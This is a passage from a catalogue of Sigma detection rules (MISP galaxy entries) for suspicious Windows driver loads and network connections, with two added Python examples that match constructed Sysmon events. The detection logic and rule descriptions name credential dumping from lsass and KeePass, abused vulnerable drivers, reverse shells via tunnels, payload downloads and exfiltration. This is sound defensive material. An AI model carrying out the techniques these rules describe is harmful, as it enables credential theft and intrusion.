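    if event.get("SourceProcessId") == event.get("TargetProcessId"):
        return hits
    if _ends_with_any(src, POWERSHELL_IMAGES):
        if dst_lower.endswith(r"\lsass.exe"):
            hits.append("Potential Credential Dumping Attempt Via PowerShell Remote Thread")
        elif not _ends_with_any(dst, POWERSHELL_EXPECTED_TARGETS):
            hits.append("Remote Thread Creation Via PowerShell In Uncommon Target")
    if dst_lower.endswith(r"\keepass.exe"):
        hits.append("Remote Thread Created In KeePass.EXE")
    if _ends_with_any(dst, UNCOMMON_TARGETS):
        hits.append("Remote Thread Creation In Uncommon Target Image")
    return hits


# Constructed sample records shaped like Sysmon EID 8 (not real telemetry).
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe",
     "SourceProcessId": 4120, "TargetProcessId": 704},
    {"SourceImage": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "SourceProcessId": 5300, "TargetProcessId": 6012},
    {"SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Program Files\KeePass Password Safe 2\KeePass.exe",
     "SourceProcessId": 7788, "TargetProcessId": 2244},
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "SourceProcessId": 4120, "TargetProcessId": 4988},
]


def run_samples(events: list[dict] = SAMPLE_EVENTS) -> list[list[str]]:
    return [evaluate_remote_thread(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{event['SourceImage']} -> {event['TargetImage']}: {hits or 'no match'}")
```

The second sample shows why the rules overlap by design: a PowerShell host injecting into notepad.exe trips both the PowerShell-specific rule and the generic uncommon-target rule, which is useful when one of them is tuned down for a noisy environment.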

PUA - Process Hacker Driver Load

Detects driver load of the Process Hacker tool

The tag is: misp-galaxy:sigma-rules="PUA - Process Hacker Driver Load"

PUA - Process Hacker Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9820. Table References

Links

https://processhacker.sourceforge.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_process_hacker.yml

Malicious Driver Load By Name

Detects loading of known malicious drivers via the file name of the drivers.

The tag is: misp-galaxy:sigma-rules="Malicious Driver Load By Name"

Malicious Driver Load By Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9821. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers_names.yml

Driver Load From A Temporary Directory

Detects a driver load from a temporary directory

The tag is: misp-galaxy:sigma-rules="Driver Load From A Temporary Directory"

Driver Load From A Temporary Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9822. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_susp_temp_use.yml

Vulnerable HackSys Extreme Vulnerable Driver Load

Detects the load of the HackSys Extreme Vulnerable Driver (HEVD), an intentionally vulnerable Windows driver developed so that security enthusiasts can learn and polish kernel-level exploitation skills, and which is often abused by threat actors

The tag is: misp-galaxy:sigma-rules="Vulnerable HackSys Extreme Vulnerable Driver Load"

Vulnerable HackSys Extreme Vulnerable Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9823. Table References

Links

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml

PUA - System Informer Driver Load

Detects driver load of the System Informer tool

The tag is: misp-galaxy:sigma-rules="PUA - System Informer Driver Load"

PUA - System Informer Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9824. Table References

Links

https://github.com/winsiderss/systeminformer

https://systeminformer.sourceforge.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_system_informer.yml

Vulnerable Driver Load By Name

Detects the load of known vulnerable drivers via the file name of the drivers.

The tag is: misp-galaxy:sigma-rules="Vulnerable Driver Load By Name"

Vulnerable Driver Load By Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9825. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml

Vulnerable WinRing0 Driver Load

Detects the load of the signed WinRing0 driver, which is often used by threat actors, crypto miners (XMRig) or other malware for privilege escalation

The tag is: misp-galaxy:sigma-rules="Vulnerable WinRing0 Driver Load"

Vulnerable WinRing0 Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9826. Table References

Links

https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/

https://github.com/xmrig/xmrig/tree/master/bin/WinRing0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml

WinDivert Driver Load

Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

The tag is: misp-galaxy:sigma-rules="WinDivert Driver Load"

WinDivert Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 9827. Table References

Links

https://rastamouse.me/ntlm-relaying-via-cobalt-strike/

https://reqrypt.org/windivert-doc.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml

Malicious Driver Load

Detects loading of known malicious drivers via their hash.

The tag is: misp-galaxy:sigma-rules="Malicious Driver Load"

Malicious Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9828. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers.yml

Vulnerable Driver Load

Detects loading of known vulnerable drivers via their hash.

The tag is: misp-galaxy:sigma-rules="Vulnerable Driver Load"

Vulnerable Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9829. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml
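The driver-load rules above use three different keys on the same Sysmon Event ID 6 record: the path (Driver Load From A Temporary Directory), the file name (the "By Name" rules and the WinRing0, HEVD, Process Hacker and WinDivert rules) and the hash (Vulnerable Driver Load, Malicious Driver Load). The following is an added example, not code from the MISP galaxy or the SigmaHQ rules: it parses Sysmon's Hashes string and applies all three checks to constructed records. The hash values are placeholders, not real indicators, and the name table is illustrative; a real deployment would load the loldrivers.io lists referenced above.

```python
"""Classify Sysmon Event ID 6 (DriverLoad) records with the three checks the
driver-load rules above describe: a driver loaded from a temporary directory,
a known driver file name, and a known driver hash.

Added example, not code from the MISP galaxy or the SigmaHQ rules. Field names
follow Sysmon's DriverLoad event (ImageLoaded, Hashes). The hash values are
constructed placeholders; the name table is illustrative (WinRing0, HEVD,
KProcessHacker and WinDivert come from the rule descriptions above) and the
real rules carry far longer curated lists.
"""
from __future__ import annotations

TEMP_DIR_MARKERS = ("\\temp\\", "\\tmp\\")   # assumed path fragments

# Lower-case file name -> rule name (illustrative, not the rules' own lists).
DRIVER_NAME_RULES = {
    "winring0.sys": "Vulnerable WinRing0 Driver Load",
    "winring0x64.sys": "Vulnerable WinRing0 Driver Load",
    "hevd.sys": "Vulnerable HackSys Extreme Vulnerable Driver Load",
    "kprocesshacker.sys": "PUA - Process Hacker Driver Load",
    "windivert.sys": "WinDivert Driver Load",
    "windivert64.sys": "WinDivert Driver Load",
}
# Constructed placeholder SHA256 values, NOT real indicators.
VULNERABLE_SHA256 = {"11" * 32}
MALICIOUS_SHA256 = {"22" * 32}


def parse_sysmon_hashes(field: str) -> dict[str, str]:
    """Split Sysmon's 'SHA1=...,MD5=...,SHA256=...' string into {algo: hex}."""
    out: dict[str, str] = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().upper()] = value.strip().lower()
    return out


def classify_driver_load(event: dict) -> list[str]:
    """Return the rule names (from this section) the DriverLoad event matches."""
    lowered = event.get("ImageLoaded", "").lower()
    file_name = lowered.rsplit("\\", 1)[-1]
    sha256 = parse_sysmon_hashes(event.get("Hashes", "")).get("SHA256", "")
    hits: list[str] = []
    if any(marker in lowered for marker in TEMP_DIR_MARKERS):
        hits.append("Driver Load From A Temporary Directory")
    if file_name in DRIVER_NAME_RULES:
        hits.append(DRIVER_NAME_RULES[file_name])
    # Hash checks catch a renamed copy of a known driver that the name check misses.
    if sha256 in VULNERABLE_SHA256:
        hits.append("Vulnerable Driver Load")
    if sha256 in MALICIOUS_SHA256:
        hits.append("Malicious Driver Load")
    return hits


# Constructed sample records shaped like Sysmon EID 6 (not real telemetry).
SAMPLE_EVENTS = [
    {"ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\WinRing0x64.sys",
     "Hashes": "SHA256=" + "11" * 32 + ",MD5=" + "ab" * 16},
    {"ImageLoaded": r"C:\Windows\System32\drivers\kprocesshacker.sys",
     "Hashes": "SHA256=" + "33" * 32},
    # Same placeholder "vulnerable" hash as the first record, but renamed.
    {"ImageLoaded": r"C:\ProgramData\svc\mon.sys",
     "Hashes": "SHA256=" + "11" * 32},
    {"ImageLoaded": r"C:\ProgramData\svc\helper.sys",
     "Hashes": "MD5=" + "cd" * 16 + ",SHA256=" + "22" * 32},
    {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Hashes": "SHA256=" + "44" * 32},
]


def run_samples(events=SAMPLE_EVENTS) -> list[list[str]]:
    return [classify_driver_load(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(event["ImageLoaded"], "->", hits or "no match")
```

The third record is the reason both a name-based and a hash-based rule exist: renaming the driver defeats the name check, while the hash still matches. Note that Sysmon only emits the algorithms configured under HashAlgorithms, so a SHA256 match requires that algorithm to be enabled in the Sysmon configuration.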

Network Connection Initiated To Visual Studio Code Tunnels Domain

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse this feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated To Visual Studio Code Tunnels Domain"

Network Connection Initiated To Visual Studio Code Tunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9830. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://badoption.eu/blog/2023/01/31/code_c2.html

https://cydefops.com/vscode-data-exfiltration

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_vscode_tunnel_connection.yml

Connection Initiated Via Certutil.EXE

Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.

The tag is: misp-galaxy:sigma-rules="Connection Initiated Via Certutil.EXE"

Connection Initiated Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9831. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml

Network Connection Initiated By AddinUtil.EXE

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate potential command-and-control communication, as this tool doesn't usually initiate network activity.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated By AddinUtil.EXE"

Network Connection Initiated By AddinUtil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9832. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_addinutil.yml

Python Initiated Connection

Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.

The tag is: misp-galaxy:sigma-rules="Python Initiated Connection"

Python Initiated Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 9833. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python

https://pypi.org/project/scapy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml

Potential Remote PowerShell Session Initiated

Detects a process that initiated a network connection over port 5985 or 5986 from a non-network-service account. This could potentially indicate a remote PowerShell connection.

The tag is: misp-galaxy:sigma-rules="Potential Remote PowerShell Session Initiated"

Potential Remote PowerShell Session Initiated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9834. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml

Outbound Network Connection To Public IP Via Winlogon

Detects a "winlogon.exe" process that initiates network communication with public IP addresses

The tag is: misp-galaxy:sigma-rules="Outbound Network Connection To Public IP Via Winlogon"

Outbound Network Connection To Public IP Via Winlogon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 9835. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml

Script Initiated Connection to Non-Local Network

Detects a script interpreter (wscript/cscript) opening a network connection to a non-local network. Adversaries may use scripts to download malicious payloads.

The tag is: misp-galaxy:sigma-rules="Script Initiated Connection to Non-Local Network"

Script Initiated Connection to Non-Local Network has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9836. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml

Suspicious Network Connection Binary No CommandLine

Detects suspicious network connections made by a well-known Windows binary run with no command line parameters

The tag is: misp-galaxy:sigma-rules="Suspicious Network Connection Binary No CommandLine"

Table 9837. Table References

Links

https://redcanary.com/blog/raspberry-robin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml

Potentially Suspicious Wuauclt Network Connection

Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy-execute code and make network connections. One could easily make the DLL spawn a new process and inject into it to proxy the network connection and bypass this rule.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Wuauclt Network Connection"

Potentially Suspicious Wuauclt Network Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9838. Table References

Links

https://dtm.uk/wuauclt/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml

Rundll32 Internet Connection

Detects a rundll32 that communicates with public IP addresses

The tag is: misp-galaxy:sigma-rules="Rundll32 Internet Connection"

Rundll32 Internet Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 9839. Table References

Links

https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml

Office Application Initiated Network Connection Over Uncommon Ports

Detects an Office suite application (Word, Excel, PowerPoint, Outlook) communicating with target systems over uncommon ports.

The tag is: misp-galaxy:sigma-rules="Office Application Initiated Network Connection Over Uncommon Ports"

Table 9840. Table References

Links

https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml

Network Connection Initiated By Regsvr32.EXE

Detects a network connection initiated by "Regsvr32.exe"

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated By Regsvr32.EXE"

Network Connection Initiated By Regsvr32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 9841. Table References

Links

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml

Microsoft Sync Center Suspicious Network Connections

Detects suspicious connections from Microsoft Sync Center to non-private IPs.

The tag is: misp-galaxy:sigma-rules="Microsoft Sync Center Suspicious Network Connections"

Microsoft Sync Center Suspicious Network Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9842. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml

RDP to HTTP or HTTPS Target Ports

Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443

The tag is: misp-galaxy:sigma-rules="RDP to HTTP or HTTPS Target Ports"

RDP to HTTP or HTTPS Target Ports has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9843. Table References

Links

https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg

https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml

Communication To Uncommon Destination Ports

Detects programs that connect to uncommon destination ports

The tag is: misp-galaxy:sigma-rules="Communication To Uncommon Destination Ports"

Communication To Uncommon Destination Ports has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 9844. Table References

Links

https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml

Suspicious Outbound SMTP Connections

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

The tag is: misp-galaxy:sigma-rules="Suspicious Outbound SMTP Connections"

Suspicious Outbound SMTP Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 9845. Table References

Links

https://www.ietf.org/rfc/rfc2821.txt

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml

Network Communication With Crypto Mining Pool

Detects initiated network connections to crypto mining pools

The tag is: misp-galaxy:sigma-rules="Network Communication With Crypto Mining Pool"

Network Communication With Crypto Mining Pool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 9846. Table References

Links

https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt

https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_crypto_mining_pools.yml

Office Application Initiated Network Connection To Non-Local IP

Detects an Office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address. This rule aims to detect traffic similar to that seen in exploitation of CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.

The tag is: misp-galaxy:sigma-rules="Office Application Initiated Network Connection To Non-Local IP"

Office Application Initiated Network Connection To Non-Local IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 9847. Table References

Links

https://corelight.com/blog/detecting-cve-2021-42292

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml

Silenttrinity Stager Msbuild Activity

Detects possible remote connections to a Silenttrinity C2 server

The tag is: misp-galaxy:sigma-rules="Silenttrinity Stager Msbuild Activity"

Silenttrinity Stager Msbuild Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"

Table 9848. Table References

Links

https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml

Suspicious Epmap Connection

Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC)

The tag is: misp-galaxy:sigma-rules="Suspicious Epmap Connection"

Table 9849. Table References

Links

https://github.com/RiccardoAncarani/TaskShell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml

Outbound RDP Connections Over Non-Standard Tools

Detects non-standard tools initiating a connection over port 3389, indicating possible lateral movement. An initial baseline is required before using this rule, to exclude third-party RDP tooling that you might use.

The tag is: misp-galaxy:sigma-rules="Outbound RDP Connections Over Non-Standard Tools"

Outbound RDP Connections Over Non-Standard Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9850. Table References

Links

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml

Suspicious Wordpad Outbound Connections

Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.

The tag is: misp-galaxy:sigma-rules="Suspicious Wordpad Outbound Connections"

Table 9851. Table References

Links

https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml

Network Connection Initiated To DevTunnels Domain

Detects network connections to DevTunnels domains initiated by a process on a system. Attackers can abuse this feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated To DevTunnels Domain"

Network Connection Initiated To DevTunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9852. Table References

Links

https://cydefops.com/devtunnels-unleashed

https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security

https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_devtunnel_connection.yml

Script Initiated Connection

Detects a script interpreter (wscript/cscript) opening a network connection. Adversaries may use scripts to download malicious payloads.

The tag is: misp-galaxy:sigma-rules="Script Initiated Connection"

Script Initiated Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9853. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml

Suspicious Non-Browser Network Communication With Telegram API

Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2

The tag is: misp-galaxy:sigma-rules="Suspicious Non-Browser Network Communication With Telegram API"

Suspicious Non-Browser Network Communication With Telegram API has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9854. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_telegram_api_non_browser_access.yml

Suspicious Outbound Kerberos Connection

Detects suspicious outbound network activity via the default Kerberos port (88), indicating possible lateral movement or a first-stage privilege escalation via delegation.

The tag is: misp-galaxy:sigma-rules="Suspicious Outbound Kerberos Connection"

Suspicious Outbound Kerberos Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 9855. Table References

Links

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml

Msiexec.EXE Initiated Network Connection Over HTTP

Detects an initiated network connection by "Msiexec.exe" over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.

The tag is: misp-galaxy:sigma-rules="Msiexec.EXE Initiated Network Connection Over HTTP"

Msiexec.EXE Initiated Network Connection Over HTTP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 9856. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec_http.yml

Suspicious Program Location with Network Connections

Detects programs with network connections running from suspicious file system locations

The tag is: misp-galaxy:sigma-rules="Suspicious Program Location with Network Connections"

Suspicious Program Location with Network Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9857. Table References

Links

https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml

RDP Over Reverse SSH Tunnel

Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389

The tag is: misp-galaxy:sigma-rules="RDP Over Reverse SSH Tunnel"

RDP Over Reverse SSH Tunnel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9858. Table References

Links

https://twitter.com/cyb3rops/status/1096842275437625346

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml

Potentially Suspicious Network Connection To Notion API

